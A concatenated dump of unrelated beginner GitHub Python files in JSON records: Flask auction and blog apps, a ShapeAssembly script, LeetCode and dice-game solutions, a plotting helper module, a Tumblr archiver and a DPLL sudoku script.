Seller((13.6562446,100.4817984), 3), Seller((13.7213584,100.5305075), 4), Seller((13.7277753,100.5352955), 5)]\n\n#initial\nauctioneer = Auctioneer()\nauctioneer.buyers = buyers\nauctioneer.sellers = sellers\nauctioneer.buyerTransaction = dummyBuyerTransaction\nauctioneer.sellerTransaction = dummySellerTransaction\nfor transaction in auctioneer.sellerTransaction:\n auctioneer.computeSellerResponse(transaction.idx)\n\n@app.route('/buyer/')\ndef buyer(id):\n global auctioneer\n pending = auctioneer.getBuyerPendingTransaction(int(id))\n complete = auctioneer.getBuyerCompletedTransaction(int(id))\n print(pending)\n return render_template('buyer.html',title='buyer',id=id, pending=pending,complete=complete)\n\n@app.route('/seller/')\ndef seller(id):\n pending = auctioneer.getSellerPendingTransaction(int(id))\n accept = auctioneer.getSellerAcceptedTransaction(int(id))\n complete = auctioneer.getSellerCompleltedFailedTransaction(int(id))\n return render_template('seller.html',title='seller',id=id, pending=pending,accept=accept,complete=complete)\n\n@app.route('/auctioneer/')\ndef index(id):\n pending = auctioneer.getAuctioneerPendingTransaction()\n complete = auctioneer.getAuctioneerCompletedTransaction()\n fail = auctioneer.getAuctioneerFailedTransaction()\n return render_template('auctioneer.html',title='auctioneer',id=id,pending=pending,complete=complete)\n\n@app.route('/create/', methods=['POST'])\ndef create(id):\n global auctioneer\n v = request.form['v']\n vmin = request.form['vmax']\n vmax = request.form['vmax']\n bmin = request.form['bmin']\n bmax = request.form['bmax']\n auctioneer.countBuyerTransaction = auctioneer.countBuyerTransaction+1\n auctioneer.createBuyerTransaction(auctioneer.countBuyerTransaction, int(id), int(v), int(vmin), int(vmax), int(bmin), int(bmax))\n\n return redirect('/buyer/'+id)\n\n@app.route('/response/', methods=['POST'])\ndef response(id):\n global auctioneer\n c = request.form['c']\n cmin = request.form['cmax']\n cmax = request.form['cmax']\n smin = request.form['smin']\n smax = request.form['smax']\n parentIdx= request.form['idx']\n print('{} {} {} {} {} {}'.format(c,cmin,cmax,smin,smax,parentIdx))\n auctioneer.countSellerTransaction = auctioneer.countSellerTransaction+1\n auctioneer.createSellerTransaction(auctioneer.countSellerTransaction, int(parentIdx), int(id), int(c), int(cmin), int(cmax), int(smin), int(smax))\n\n return redirect('/seller/'+id)\n\n\n@app.route('/confirmBuyerTransaction/', methods=['POST'])\ndef confirmBuyerTransaction(id):\n global auctioneer\n sellerTransactionIdx = int(request.form['idx'])\n auctioneer.completeBuyerTransaction(sellerTransactionIdx)\n return redirect('/buyer/'+id)\n\nif __name__ == '__main__':\n app.run(debug=True)\t","repo_name":"titlethanason/V2V_ElectricSharing","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11681948302","text":"import torch\nfrom model_prog import Sampler, MLP, FDGRU, ENCGRU, progToData, get_encoding, run_eval_decoder\nfrom ShapeAssembly import hier_execute\nimport utils\nimport sys\nfrom tqdm import tqdm\n\nsa_enc = \"model_output/chair_autoencoder/models/encoder_119.pt\"\nsa_dec = \"model_output/chair_autoencoder/models/decoder_119.pt\"\n\ndevice = torch.device(\"cuda\")\n\n\ndef getInds(train_ind_file):\n inds = set()\n with open(train_ind_file) as f:\n for line in f:\n inds.add(line.strip())\n return inds\n\n\ndef do_sa():\n train_ind_file = f'data_splits/chair/train.txt'\n train_inds = list(getInds(train_ind_file))\n\n encoder = torch.load(sa_enc).to(device)\n decoder = torch.load(sa_dec).to(device)\n\n for ind in tqdm(train_inds):\n rprog = utils.loadHPFromFile(f'data/chair/{ind}.txt')\n shape = progToData(rprog)\n enc, _ = get_encoding(shape, encoder, mle=True)\n hier_prog, _ = run_eval_decoder(enc, decoder, False)\n verts, faces = hier_execute(hier_prog)\n utils.writeObj(verts, faces, f'autoencoder_objs/{ind}.obj')\n\n\nif __name__ == '__main__':\n do_sa()\n","repo_name":"andrewkpeterson/ShapeAssembly","sub_path":"code/create_training_objs.py","file_name":"create_training_objs.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"26395801758","text":"#AUTHOR: BABATUNDE IDAHOR\n#COURSE: CS133\n#TERM : FALL 2015\n#DATE : 11/3/2015\n\n\n##This program accepts a list of test scores and produces a histogram summarizing\n##the data.\n\n\n# Enter Input score here\nnum_of_values = int(input('Enter the number of test score you have: ')) # number of values to be entered by the user\ntest_score = list() # creates a list to store test_scores\nstart = 0\n\n\n#This loop creates a list and stores/appends the values in test_score.\nfor i in range(start, num_of_values, 1):\n test_scoreEntered = float(input('Enter test score here: ')) # takes floating values\n test_scoreEntered = round(test_scoreEntered) # returns the floating point value number rounded to zero after the decimal point \n test_score.append(test_scoreEntered)\nprint('---------------All Done-------------------------- ' + '\\n' + 'Data Entry so far ' + str(test_score))\n\n\n# Creates a new dictionary and traverses the dictionary\ndict_score = dict()\nfor i in test_score:\n if i not in dict_score:\n dict_score[i] = '*'\n else:\n dict_score[i] += '*'\n \nprint('----------------Histogram Result------------------') \nnum = list(dict_score.keys())\nnum.sort()\n\n\n# Displays the histogram #\nfor i in num:\n if i < 10 :\n print('v'+str(int(i)) + ' ' + dict_score[i])\n else:\n print('v'+str(int(i)) + ' ' + dict_score[i])\n \n \n\n\n \n\n\n\n","repo_name":"bidahor13/Python_projects","sub_path":"P3/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3345638297","text":"\"\"\"\r\n暴力超时\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n def dailyTemperature(self, T):\r\n res = []\r\n for i in range(len(T)):\r\n flag = 0\r\n for j in range(i + 1, len(T)):\r\n if T[j] > T[i]:\r\n flag += 1\r\n res.append(j - i)\r\n break\r\n if flag == 0:\r\n res.append(0)\r\n return res\r\n\r\n\r\n# print(Solution().dailyTemperature([73, 74, 75, 71, 69, 72, 76, 73, 80]))\r\n\r\n\"\"\"\r\n单调栈做法:\r\n栈是单调递减的\r\n\"\"\"\r\n\r\n\r\nclass Solution1:\r\n def dailyTemperature(self, T):\r\n l = len(T)\r\n res =[0 for i in range(l)]\r\n stack = [] # 栈存储的是温度的索引\r\n for i in range(l):\r\n temperature = T[i]\r\n while stack and temperature > T[stack[-1]]:\r\n prev_index = stack.pop() # 遇到比栈顶温度高的数,就弹出栈顶,直至栈内元素大于该元素,或者栈为空\r\n res[prev_index] = i - prev_index # 弹出的索引对应该温度需要等待的天数\r\n stack.append(i)\r\n return res","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Top 100/739.dailyTemperature.py","file_name":"739.dailyTemperature.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4573763182","text":"# url+视图函数\nfrom django.core import paginator\nfrom flask import Blueprint, render_template, request, redirect, url_for, session, abort\nfrom .models import *\n\nblog = Blueprint('blog', __name__)\nadmin = Blueprint('admin', __name__)\n\n\n@blog.route('/')\ndef home():\n return 'HOME'\n\n##################################################################################\n##后台\n##################################################################################\n#后台登录\n@admin.route('/login/',methods=['GET','POST'])\ndef admin_login():\n if request.method == 'POST':\n # 接收客户端数据\n username = request.form.get('username')\n password = request.form.get('userpwd')\n # 判断?是否成功\n if username == 'song' and password == '123':\n res = redirect(url_for('admin.admin_index'))\n # 获取cookie:通过key,获取value\n res.set_cookie('user',username)\n\n\n # 获取session,\n # session['user'] = username\n # session['username'] = username\n print(username)\n print(res)\n return res\n return '登录失败!'\n return render_template('admin/login.html')\n\n#退出登录,注销cookie\n@admin.route('/logout/')\ndef admin_logout():\n res = redirect(url_for('admin.admin_login'))\n #获取cookie,并删除key:pop,删除当前。clear清空所有\n res.delete_cookie('username')\n\n # 获取session,并删除session\n # session.pop('user')\n return res\n\n\n\n# 管理首页\n@admin.route('/admin/')\ndef admin_index():\n # 获取cookie\n # # 获取当前登录用户\n count =len(Article.query.all())\n username = request.cookies.get('user','')\n\n # 获取session\n # username = session.get('user','')\n print(username)\n if username == '':\n res = redirect(url_for('admin.admin_login'))\n return res\n data = {\n 'count':count,\n 'username':username,\n }\n print(1111)\n print(count)\n print(username)\n return render_template('admin/index.html',**data) #Flask 多个传参 **data 单个参数data=data\n\n\n# 文章管理\n@admin.route('/article/',methods=['GET','POST'])\ndef admin_article():\n #获取当前登录用户\n username = request.cookies.get('user','')\n print(1111111)\n print(username)\n if username == '':\n abort(403)\n res = redirect(url_for('admin.admin_login'))\n return res\n\n return redirect(url_for('admin.admin_article_page',page=1))\n#后台文章分页表:\n@admin.route('/article//')\ndef admin_article_page(page):\n per_page = 4 #初始化,每页显示2条数据\n if not page: # 如果前端没有传参,默认就是第一页page = 1,\n page = 1\n articles = Article.query.all()\n articles = articles[(page-1)*per_page:page*per_page]\n my_pageinate = Article.query.order_by('id').paginate(page=page,per_page=per_page)\n username = request.cookies.get('user','')\n data = {\n 'articles': articles,\n 'my_pageinate':my_pageinate,\n 'username':username,\n }\n # print(articles[0].my_article.name,type(articles[0])) #通过外键,找到对象中的字段名称 name\n return render_template('admin/article.html',**data)\n\n\n\n# 增加文章链接\n@admin.route('/addarticle/',methods = ['POST','GET'])\ndef admin_addarticle():\n # return render_template('admin/add-article.html')\n #获取属性表中所有字段\n articletypes = Articletype.query.all()\n username = request.cookies.get('user','')\n if username == '':\n return redirect(url_for('admin.admin_login'))\n if request.method =='POST':\n # 获取前端数据\n title = request.form.get('title')\n text = request.form.get('content')\n keyword = request.form.get('keywords')\n describe =request.form.get('describe')\n typename = request.form.get('category')\n label = request.form.get('tags')\n img = request.form.get('titlepic')\n data = request.form.get('data')\n\n # 创建对象Article\n a = Article()\n a.title = title\n a.text = text\n a.keyword =keyword\n a.describe = describe\n a.articletypeid = typename\n a.label = label\n a.img = img\n a.data = data\n db.session.add(a)\n db.session.commit()\n res = redirect(url_for('admin.admin_addarticle'))\n return res\n data ={\n 'articletypes':articletypes,\n 'username':username,\n }\n return render_template('admin/add-article.html',**data)\n\n\n# 栏目管理\n@admin.route('/category/',methods = ['GET','POST'])\ndef admin_category():\n articletypes = Articletype.query.all()\n username = request.cookies.get('user','')\n if username == '':\n res = redirect('admin.admin_login')\n return res\n if request.method == 'POST':\n name = request.form.get('name')\n alias =request.form.get('alias')\n fid = request.form.get('fid')\n keywords = request.form.get('keywords')\n describe = request.form.get('describe')\n print(name)\n #创建对象:Articletype\n articletype = Articletype()\n articletype.name = name\n articletype.alias = alias\n articletype.parentnode =fid\n articletype.keyword = keywords\n articletype.describe = describe\n db.session.add(articletype)\n db.session.commit()\n res = redirect(url_for('admin.admin_category'))\n return res\n data = {\n 'articletypes':articletypes,\n 'username':username\n }\n return render_template('admin/category.html',**data)\n\n\n# 公告管理\n@admin.route('/notice/',methods = ['GET','POST'])\ndef admin_notice():\n #获取数据库的信息\n\n return redirect(url_for('admin.admin_notice_page',page=1))\n\n#公告分页\n@admin.route('/notice//')\ndef admin_notice_page(page):\n per_page = 3\n if not page:\n page = 1\n articles = Article.query.all()\n articles = articles[(page-1)*per_page:page*per_page]\n my_paginate = Article.query.order_by('id').paginate(page=page,per_page=per_page)\n username = request.cookies.get('user', '')\n if username == '':\n res = redirect('admin.admin_login')\n return res\n data = {\n 'articles': articles,\n 'username': username,\n 'my_paginate':my_paginate\n }\n return render_template('admin/notice.html',**data)\n\n\n# 增加公告\n@admin.route('/addnotice/',methods = ['GET',\"POST\"])\ndef admin_addnotice():\n articles = Article.query.all()\n username = request.cookies.get('user','')\n if username == '':\n res = redirect(url_for('admin.admin_login'))\n return res\n if request.method == 'POST':\n title = request.form.get('title')\n content = request.form.get('content')\n keywords = request.form.get('keywords')\n describe = request.form.get('describe')\n #创建对象Article\n a = Article()\n a.title = title\n a.text = content\n a.keyword = keywords\n a.describe =describe\n db.session.add(a)\n db.session.commit()\n res = redirect(url_for('admin.admin_addnotice'))\n return res\n data = {\n 'username':username,\n 'articles':articles,\n }\n return render_template('admin/add-notice.html',**data)\n\n# 评论管理\n@admin.route('/comment/')\ndef admin_comment():\n return render_template('admin/comment.html')\n\n# 用户管理\n@admin.route('/manageuser/')\ndef admin_manageuser():\n return render_template('admin/manage-user.html')\n\n# 管理登录日志\n@admin.route('/loginlog/')\ndef admin_loginlog():\n return render_template('admin/loginlog.html')\n\n# 基本设置\n@admin.route('/setting/')\ndef admin_setting():\n return render_template('admin/setting.html')\n\n# 阅读设置\n@admin.route('/readset/')\ndef admin_readset():\n return render_template('admin/readset.html')\n\n# 友情链接\n@admin.route('/flink/')\ndef admin_flink():\n return render_template('admin/flink.html')\n\n# 增加友情链接\n@admin.route('/addflink/')\ndef admin_addflink():\n return render_template('admin/add-flink.html')\n\n\n##################################################################################\n##前台\n##################################################################################\n#首页\n@blog.route('/index/')\ndef index():\n articles = Article.query.all()\n articletypes = Article.query.all()\n data = {\n 'articles':articles,\n 'articletypes':articletypes,\n }\n return render_template('blog/index.html',**data)\n# # 网站首页\n# @blog.route('/index/')\n# def index():\n# return redirect(url_for('blog.index_page',page =1))\n\n# # 首页分页:\n# @blog.route('/index/')\n# def index_page(page):\n# per_page = 3\n# if not page:\n# page = 1\n# articles = Article.query.all()\n# articletypes = Articletype.query.all()\n# #获取得到所有数据,套用分页公式\n# articles = articles[(page-1)*per_page:page:per_page]\n# #分页完成,排序order_by(),获取页数page 每页数量per_page\n# my_paginate = Article.query.order_by('id').paginate(page = page,per_page = per_page)\n# data ={\n# 'articles':articles,\n# 'articletypes':articletypes,\n# 'my_paginate':my_paginate,\n# }\n# return render_template('blog/index.html',**data)\n\n\n\n\n# 首页分页:\n\n#文章分类表\n@blog.route('/articletype//')\ndef Article_type(articletypeid):\n articletypes = Articletype.query.all() #获取类型表所有数据\n articles = Articletype.query.get(articletypeid).articles #获取类型表关联的文章\n return render_template('blog/index.html',articletypes=articletypes,articles=articles)\n\n\n\n# 我的相册\n@blog.route('/share/')\ndef share():\n return render_template('blog/share.html')\n\n# 我的日记\n@blog.route('/list/')\ndef list():\n return render_template('blog/list.html')\n\n# 关于我\n@blog.route('/about/')\ndef about():\n articletypes = Articletype.query.all() #获取类型表所有数据\n return render_template('blog/about.html',articletypes=articletypes)\n\n# 留言\n@blog.route('/gbook/')\ndef gbook():\n return render_template('blog/gbook.html')\n\n# 内容页\n@blog.route('/info/')\ndef info():\n return render_template('blog/info.html')\n\n# 内容页\n@blog.route('/infopic/')\ndef infopic():\n return render_template('blog/infopic.html')\n\n# 添加文章数据\n# @blog.route('/addarticle/')\n# def add_article():\n# #添加数据,创建对象\n# a = Article()\n# a.title = '生命终结的末端,苦短情长'\n# a.text = '天朝羽打开一扇窗,我不曾把你想得平常。看季节一一过往。'\n# a.img = 'App/static/blog/images/7.jpg'\n# try:\n# db.session.add(a)\n# db.session.commit()\n# except:\n# db.session.rollback()\n# db.session.flush()\n# return 'fail'\n# return 'success'\n\n","repo_name":"Gcxy1/blog","sub_path":"FlaskBlogPro/App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23336386744","text":"#========================\n# Cute module\n# Yen Lee Loh 2023-6-4\n#========================\nfrom IPython.display import display,HTML,Markdown\ndisplay(HTML('''\n'''))\ndisplay(Markdown(r'''\n$\\newcommand{\\mean}[1]{\\langle #1 \\rangle}$\n$\\newcommand{\\bra}[1]{\\langle #1 \\rvert}$\n$\\newcommand{\\ket}[1]{\\lvert #1 \\rangle}$\n$\\newcommand{\\adag}{a^\\dagger}$\n$\\newcommand{\\mat}[1]{\\underline{\\underline{\\mathbf{#1}}}}$\n$\\newcommand{\\beq}{\\qquad\\begin{align}}$\n$\\newcommand{\\eeq}{\\end{align}}$\n$\\newcommand{\\half}{\\frac{1}{2}}$\n'''))\n\nimport collections.abc as abc\nimport numpy as np; from numpy import random\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nrng = random.default_rng()\n\nclass simpleCallback:\n def _implements_train_batch_hooks(): return True\n def _implements_test_batch_hooks(): return True\n def _implements_predict_batch_hooks(): return True\n def on_train_begin(logs): return\n def on_train_end(logs): print();return\n def on_epoch_begin(epoch,logs): print ('\\rEpoch =', epoch, end=''); return\n def on_epoch_end(epoch,logs): return\n def on_train_batch_begin(batch,logs): return\n def on_train_batch_end(batch,logs): return\n def set_model(a): return\n def set_params(a): return\n\ndef select (inputs, outputs, nT, nV, shuffle=False, seed=0):\n '''\n Split a dataset into training and validation sets.\n\n inputs: numpy.ndarray, where inputs[n] is the nth input vector (which itself may be a multidimensional array)\n outputs: numpy.ndarray, where outputs[n] is the nth output vector (which itself may be a multidimensional array)\n nT: number of items in training set\n nV: numebr of items in validation set\n '''\n nmax = len(inputs)\n assert len(outputs)==nmax and nT+nV<=nmax\n if shuffle:\n if seed>0:\n rng2 = np.random.default_rng (seed=seed)\n perm = rng2.permutation (nmax)\n else:\n perm = rng.permutation (nmax)\n else:\n perm = np.arange (nT+nV)\n indicesT = perm[:nT]\n indicesV = perm[-nV:]\n return inputs[indicesT], outputs[indicesT], inputs[indicesV], outputs[indicesV]\n\ndef gallery(xnij, cmap='viridis', labels=None, size=1, maxcols=20, wspace=0.02, hspace=0.02): # size is in inches\n '''\n Display a row of images.\n\n xnij: list of images (each image may be a PIL.Image or numpy.ndarray) \n labels: list of labels for image\n size: width of each image, in inches\n maxcols: maximum number of columns in gallery display before wrapping\n wspace: fractional horizontal spacing between columns of images\n hspace: fractional vertical spacing between rows of images\n ''' \n nmax = len(xnij)\n cols = min(nmax,maxcols) ; rows = (nmax+cols-1)//cols\n fig,axs = plt.subplots (rows,cols, figsize=(cols*size*(1+wspace),rows*size*(1+hspace)), gridspec_kw={'wspace':wspace,'hspace':hspace})\n if nmax==1: axs = np.array([[axs]])\n axs = axs.flatten()\n for ax in axs: ax.axis ('off')\n for n in range(nmax):\n ax = axs[n]\n if isinstance (cmap, abc.Iterable) and not isinstance (cmap, str): c = cmap[n]\n else: c = cmap\n ax.imshow (xnij[n], cmap=c)\n ax.set_aspect('equal')\n if isinstance (labels, abc.Iterable):\n ax.set_title (str(labels[n]))\n \n\ndef axgrid (widths=4, heights=2, ha=.5, va=.5, bottomtotop=False, labels=None, removeticks=True, padl=0, padt=0):\n '''\n Make a Figure and an array of Axes, arranged in a grid layout.\n \n Examples:\n \n >>> axgrid (3,1) # One plot of size 3x1\n >>> axgrid ([1,4,2,3], [1]) # One row of plots, all of height 1\n >>> axgrid (6, [.2, .4, .2]) # One column of plots\n >>> axgrid ([.2,3,3], [.2,.4,.4,.4]) # Grid with unequal widths and heights\n >>> axgrid ([.2,3,3], [.2,.4,.4,.4], bottomtotop=True) # Reverse vertical order of plots\n \n If *widths* and *heights* are both 2D arrays, some of the plots may be smaller than the allotted grid cell.\n In this case, *ha* and *va* determine horizontal alignment and vertical alignment. For example:\n \n >>> axgrid ([[2,2,3],[2,3,2]], [[1,1,1],[2,1,2]], ha='left', va='top', labels='auto')\n \n Rows are usually in top-to-bottom order. This may be reversed using the *bottomtotop* argument:\n \n >>> axgrid ([[2,2,3],[2,3,2]], [[1,1,1],[2,1,2]], ha='right', va='center', labels='auto', bottomtotop=True)\n \n In order to address the Figure and Axes objects, one should save the return values:\n \n >>> fig,axs = axgrid ([[2,2,3],[2,3,2]], [[1,1,1],[2,1,2]], removeticks=False)\n >>> ax = axs[0,0]; ax.plot ([1,2],[1,2])\n >>> ax = axs[1,2]; ax.plot ([1,2],[1,2]);\n \n The Axes in row i and column j is axs[i,j]. It has size width[i,j] x height[i,j].\n These conventions are consistent with matrix indexing conventions (and plt.subplots and numpy.ndarray)\n Generally, where indices are concerned, row indices are quoted before column indices.\n However, where physical dimensions are concerned, widths are quoted before heights,\n according to the conventional ordering of Cartesian coordinates (x,y) (and plt.plot).\n \n Parameters\n ----------\n widths, heights : scalar, 1D, or 2D array-like\n \n Returns\n ----------------\n fig, axs : Figure object and numpy.ndarray of Axes objects\n \n Other Parameters\n ----------------\n ha : 'left', 'center', 'right', float between 0 and 1; or 1D or 2D array of such specifications\n va : 'top', 'center', 'bottom', float between 0 and 1; or 1D 2D array of such specifications\n bottomtotop : False (default) or True\n labels : \n None do not draw labels\n 'auto' label each Axes as axs[rowNumber,columnNumber]\n 2D array of strings custom labels to draw in the center of each Axes\n removeticks :\n True set each Axes to show only the frame (and no ticks)\n False leave Axes tick marks intact\n removeframe : \n TBD\n '''\n #======== Determine number of grid cells\n wij = np.array (widths) \n hij = np.array (heights)\n if wij.ndim==0: wij = np.array([wij])\n if hij.ndim==0: hij = np.array([hij])\n jmax = wij.shape[-1]\n imax = hij.shape[0]\n if wij.ndim==1: wij = np.tile (wij, (imax,1)) # Extend 1D to 2D\n if hij.ndim==0: hij = np.tile (hij, (imax,jmax)) # Extend 0D to 2D\n if hij.ndim==1: hij = np.tile (np.array([hij]).T, (1,jmax)) # Extend 1D to 2D\n assert hij.shape == wij.shape,'ERROR: axgrid was supplied with incompatible widths and heights!'\n if not bottomtotop:\n wij = np.flipud (wij)\n hij = np.flipud (hij)\n #======== Deal with padding\n plij = np.array (padl) # padding left\n ptij = np.array (padt) # padding top\n if plij.ndim==0: plij = np.tile (plij, (imax,jmax))\n if ptij.ndim==0: ptij = np.tile (ptij, (imax,jmax))\n #======== Determine dimensions of grid cells\n wj = np.max (wij + plij, axis=0)\n hi = np.max (hij + ptij, axis=1)\n w = np.sum (wj)\n h = np.sum (hi)\n xj = np.concatenate ([[0], np.cumsum (wj)])\n yi = np.concatenate ([[0], np.cumsum (hi)])\n uij = np.array(ha) # Array of horizontal alignment pars\n vij = np.array(va) # Array of vertical alignment pars\n if uij.ndim==0: uij = np.tile (uij, (imax,jmax))\n if uij.ndim==1: uij = np.tile (uij, (imax,1))\n if vij.ndim==0: vij = np.tile (vij, (imax,jmax))\n if vij.ndim==1: vij = np.tile (np.array([vij]).T, (1,jmax))\n for i in range(imax):\n for j in range(jmax):\n if isinstance(uij[i,j],str): uij[i,j] = {'left':0, 'center':0.5, 'right':1}.get(uij[i,j])\n if isinstance(vij[i,j],str): vij[i,j] = {'top':0, 'center':0.5, 'bottom':1}.get(vij[i,j])\n uij = uij.astype (np.float64)\n vij = vij.astype (np.float64)\n #======== Create Axes\n fig,axs = plt.subplots (imax, jmax, figsize=(w,h))\n axs = np.array(axs).reshape ((imax,jmax)) # ensure this is always a imax*jmax numpy array of Axes\n for i in range(imax):\n for j in range(jmax):\n i2 = i if bottomtotop else imax-1-i\n x = (xj[j] + uij[i,j]*(wj[j] - wij[i,j])) / w\n y = (yi[i] + vij[i,j]*(hi[i] - hij[i,j])) / h\n axs[i2,j].set_position ([ x, y, wij[i,j]/w, hij[i,j]/h])\n if isinstance(labels,str) and labels=='auto':\n labels = np.array([[f'axs[{i},{j}]\\n{wij[i][j]}x{hij[i][j]}' for j in range(jmax)] for i in range(imax)])\n if removeticks:\n for i in range(imax):\n for j in range(jmax):\n axs[i,j].set_xticks ([])\n axs[i,j].set_yticks ([])\n if isinstance(labels,np.ndarray):\n for i in range(imax):\n for j in range(jmax):\n axs[i,j].text (.5, .5, labels[i,j], ha='center', va='center', fontsize=20)\n axs[i,j].set_facecolor ('#FFFFCC')\n return fig,axs\n\ndef modifyAxSize (ax, wnew, hnew):\n wfig,hfig = ax.figure.get_size_inches()\n x0,y0,x1,y1 = ax.get_position().extents\n x0 *= wfig; x1 *= wfig; y0 *= hfig; y1 *= hfig\n x1 = x0 + wnew\n ym = (y0+y1)/2; y0=ym-hnew/2; y1=ym+hnew/2\n x0 /= wfig; x1 /= wfig; y0 /= hfig; y1 /= hfig\n ax.set_position([x0,y0,x1-x0,y1-y0])","repo_name":"lohyenlee/tf","sub_path":"TF/cute.py","file_name":"cute.py","file_ext":"py","file_size_in_byte":9147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2391393080","text":"# Create a function that requests for three integers then get the maximum number\ndef getnumbers():\n list = []\n x = 1\n while x<4:\n num = input(\"Enter a number: \")\n list.append(num)\n x+=1\n getmaxnum(list)\n\n\ndef getmaxnum(list):\n print(max(list))\ny=1\nwhile y != 0:\n getnumbers()\n y = int(input(\"To exit enter 0, press other numbers to continue: \\t\"))","repo_name":"KOdunga/Python_Introduction","sub_path":"PycharmProjects/untitled1/maxnumber.py","file_name":"maxnumber.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17628478436","text":"from django.urls import reverse_lazy\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib import messages\nfrom django.views.generic import FormView\n\nfrom blog.forms import CreateBlogForm, GetPostsForm\nfrom blog.models import Blog\nfrom post.models import Post, Block, Reblog\n\n\nclass Index(FormView):\n template_name = \"blog/index.html\"\n form_class = CreateBlogForm\n success_url = reverse_lazy('index')\n\n @property\n def blogs(self):\n return Blog.objects.all()\n\n def form_valid(self, form):\n json, status_code = form.get_blog_info()\n\n if status_code != 200:\n messages.error(self.request, f'Got {status_code} from Tumblr API')\n\n blog_info = json['response']['blog']\n\n if Blog.objects.filter(uuid=blog_info['uuid']).exists():\n return super().form_valid(form)\n\n Blog.objects.create(\n avatar=blog_info['avatar'],\n description=blog_info['description'],\n name=blog_info['name'],\n title=blog_info['title'],\n total_posts=blog_info['total_posts'],\n url=blog_info['url'],\n )\n\n messages.success(self.request, f\"Blog {blog_info['name']} added!\")\n\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n return super().get_context_data(\n blogs=self.blogs,\n **kwargs\n )\n\n\nclass BlogDetail(FormView):\n template_name = 'blog/detail.html'\n form_class = GetPostsForm\n\n @property\n def blog(self):\n return get_object_or_404(Blog, name=self.kwargs['name'])\n\n def get_success_url(self):\n return reverse_lazy('blog-detail', kwargs=self.kwargs)\n\n def get_context_data(self, **kwargs):\n return super().get_context_data(\n blog=self.blog,\n **kwargs\n )\n\n def form_valid(self, form):\n json, status_code = form.get_posts(self.kwargs['name'], **form.cleaned_data)\n\n if status_code != 200:\n messages.error(self.request, f'Got {status_code} from Tumblr API')\n\n posts = json['response']['posts']\n\n for post in posts:\n # new_post = get_necessary_fields(post, Post, exclude='blog')\n\n if Post.objects.filter(id=post['id']).exists():\n continue\n\n new_post = Post.objects.create(\n blog=self.blog,\n id=post['id'],\n type=post['type'],\n post_url=post['post_url'],\n tags=post.get('tags', ''),\n summary=post['summary'],\n source_url=post.get('source_url', ''),\n content=post.get('content', ''),\n layout=post.get('layout', ''),\n )\n\n for reblog in post['trail']:\n new_reblog = Reblog.objects.create(post=new_post)\n\n for block in reblog['content']:\n\n url = ''\n\n if block.get('media'):\n url = block.get('media')[0]['url']\n\n new_block = Block.objects.create(\n reblog=new_reblog,\n text=block.get('text'),\n url=url,\n )\n new_block.save()\n\n return super().form_valid(form)\n","repo_name":"eadpearce/blog-archiver","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"424290225","text":"# 백준 14499 주사위 굴리기\n\nN, M, x, y, K = map(int, input().split())\n\ngrid = []\nfor _ in range(N):\n grid.append(list(map(int, input().split())))\n\ncmd = list(map(int, input().split()))\ndxy = [(1, 0), (0, 1), (0, -1), (-1, 0)] # 남(4) 동(1) 서(2) 북(3)\n\ndise = [0 for _ in range(6)] # 바닥면 인덱스 : 5\n\nfor c in cmd:\n # 맵에서 주사위 이동\n dx, dy = dxy[c%4]\n nx, ny = x+dx, y+dy\n if 0 <= nx < N and 0 <= ny < M:\n x, y = nx, ny\n else:\n continue\n\n # 바닥면 갱신\n if c == 1: # 동\n dise[0], dise[5], dise[3], dise[2] = dise[3], dise[2], dise[5], dise[0]\n elif c == 2: # 서\n dise[0], dise[5], dise[3], dise[2] = dise[2], dise[3], dise[0], dise[5]\n elif c == 3: # 북\n dise[1], dise[0], dise[4], dise[5] = dise[0], dise[4], dise[5], dise[1]\n elif c == 4: # 남\n dise[1], dise[0], dise[4], dise[5] = dise[5], dise[1], dise[0], dise[4]\n\n if grid[x][y]:\n dise[5] = grid[x][y]\n grid[x][y] = 0\n else:\n grid[x][y] = dise[5]\n\n print(dise[0])","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"031주차/주사위 굴리기/hyunseo.py","file_name":"hyunseo.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"648036264","text":"from random import *\nfrom dpll import dpll\nfrom dpll_ena_cista_pojavitev import *\nfrom dpll_brez import dpll_osnoven\nfrom sudoku import *\nfrom time import clock\n\n\nprint(\"Primerjava DPLL algoritmov z, brez, ter z le eno začetno preverbo čiste pojavitve. \\n\")\nD = input(\"Primerjam DPLL s čisto pojavitvijo? (y/n) \")\nD1 = input(\"Primerjam DPLL z le eno izvedbo čiste pojavitve (takoj na začetku)? (y/n) \")\nDB = input(\"Primerjam osnoven DPLL, brez implementacije čiste pojavitve? (y/n) \")\nL = 0\nif not (D==\"n\" and D1==\"n\" and DB==\"n\"):\n\tL = int(input(\"Koliko naključnih polnitev polj (sudokujev) zgeneriram? Vnesi naravno št.\"))\n\nif not (D==\"n\" and D1==\"n\" and DB==\"n\"):\n\tprint(\"\\n Prazen sudoku:\")\n\tprint(\"=\"*25)\n\tCNF = sudoku([]).cnf()\n\nif D==\"y\":\n\tkopija = Cnf([Stavek([i for i in s.literali]) for s 